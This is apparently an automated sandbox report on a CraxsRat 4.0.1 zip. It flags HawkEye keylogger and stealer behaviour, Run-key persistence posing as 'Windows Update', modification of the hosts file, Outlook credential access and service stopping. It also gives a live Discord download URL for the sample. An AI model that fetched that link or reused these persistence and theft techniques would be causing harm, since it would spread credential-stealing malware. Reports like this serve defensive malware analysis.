Malware Analysis Report

2024-09-22 11:36

Sample ID 230621-ampkqseh24
Target https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip
Tags
hawkeye collection discovery evasion keylogger persistence spyware stealer trojan
Score: 10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score: 10/10

Threat Level: Known bad

The file https://cdn.discordapp.com/attachments/1096943623599312947/1120870643668373535/CraxsRat_4.0.1.zip was found to be: Known bad.

Malicious Activity Summary

hawkeye collection discovery evasion keylogger persistence spyware stealer trojan

Suspicious use of NtCreateUserProcessOtherParentProcess

HawkEye

NirSoft MailPassView

NirSoft WebBrowserPassView

Nirsoft

Blocklisted process makes network request

Stops running service(s)

Drops file in Drivers directory

Downloads MZ/PE file

Uses the VBS compiler for execution

Drops startup file

Checks computer location settings

Executes dropped EXE

Registers COM server for autorun

Modifies system executable filetype association

Loads dropped DLL

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Accesses Microsoft Outlook accounts

Checks installed software on the system

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Enumerates system info in registry

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Modifies registry class

Suspicious behavior: EnumeratesProcesses

MITRE ATT&CK Matrix V6

Analysis: static1

Detonation Overview

Reported

2023-06-21 00:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-06-21 00:19

Reported

2023-06-21 00:30

Platform

win10v2004-20230220-en

Max time kernel

529s

Max time network

507s

Command Line

C:\Windows\system32\lsass.exe

Signatures

HawkEye

keylogger trojan stealer spyware hawkeye

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Nirsoft

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg1.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\CraxsRat_4.0.1\CraxsRat 4.0.1\CraxsRat 4.0.1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\BLACKK.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\winrar-x64-622.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\%startupname%.lnk C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\Explorer.EXE N/A

Modifies system executable filetype association

persistence

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A

Registers COM server for autorun

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ThreadingModel = "Apartment" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32 C:\Program Files\WinRAR\uninstall.exe N/A

Uses the VBS compiler for execution

Accesses Microsoft Outlook accounts

collection

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe N/A

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update = "C:\\Users\\Admin\\AppData\\Roaming\\WindowsUpdate.exe" C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
Key created \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\Software\Microsoft\Windows\CurrentVersion\Run C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-144354903-2550862337-1367551827-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsHostProcessor = "\"C:\\Users\\Admin\\AppData\\Roaming\\WindowsHostProcessor\\WindowsHostProcessor.exe\" " C:\Users\Admin\AppData\Local\Temp\qrjhwnek.reg2.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Description Indicator Process Target
N/A whatismyipaddress.com N/A N/A
N/A whatismyipaddress.com N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\WinRAR\Rar.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Rar.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Zip64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\7zxa.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExt32.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtPackage.msix C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Uninstall.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExt32.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinRAR.chm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarFiles.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Resources.pri C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\zipnew.dat C:\Program Files\WinRAR\uninstall.exe N/A
File created C:\Program Files\WinRAR\__tmp_rar_sfx_access_check_240613437 C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-64.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\ReadMe.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Uninstall.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\7zxa.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinCon64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Descript.ion C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WhatsNew.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Order.htm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Rar.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtInstaller.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Descript.ion C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Rar.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtPackage.msix C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\rarnew.dat C:\Program Files\WinRAR\uninstall.exe N/A
File opened for modification C:\Program Files\WinRAR\WhatsNew.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Uninstall.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Resources.pri C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinCon.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Zip.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\ReadMe.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\License.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Uninstall.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Default64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinCon.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Zip.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\WinRAR.chm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtInstaller.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Order.htm C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\UnRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\RarExt.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Default.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\WinCon64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-32.png C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\License.txt C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\UnRAR.exe C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarExt.dll C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Default64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\Zip64.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File created C:\Program Files\WinRAR\RarFiles.lst C:\Users\Admin\Downloads\winrar-x64-622.exe N/A
File opened for modification C:\Program Files\WinRAR\Default.SFX C:\Users\Admin\Downloads\winrar-x64-622.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133317804125845429" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lzh C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.tbz\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r17\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r22\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.uu\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r06\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.7z C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.7z\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r00 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r16 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.arj C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r02 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rar\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r24 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r04 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B41DB860-64E4-11D2-9906-E49FADC173CA}\InProcServer32\ = "C:\\Program Files\\WinRAR\\rarext.dll" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ShellNew C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.lha\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.tar\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r07 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bz C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r17 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r25\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.zst C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r04\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.xxe\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.txz\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r09\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cab C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.gz C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.001 C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.rar C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r19 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r12\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.lz C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r18 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.r29\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.arj\ = "WinRAR" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r22 C:\Program Files\WinRAR\uninstall.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.zip\ = "WinRAR.ZIP" C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR C:\Program Files\WinRAR\uninstall.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.r15 C:\Program Files\WinRAR\uninstall.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CraxsRat 4.0.1.exe N/A
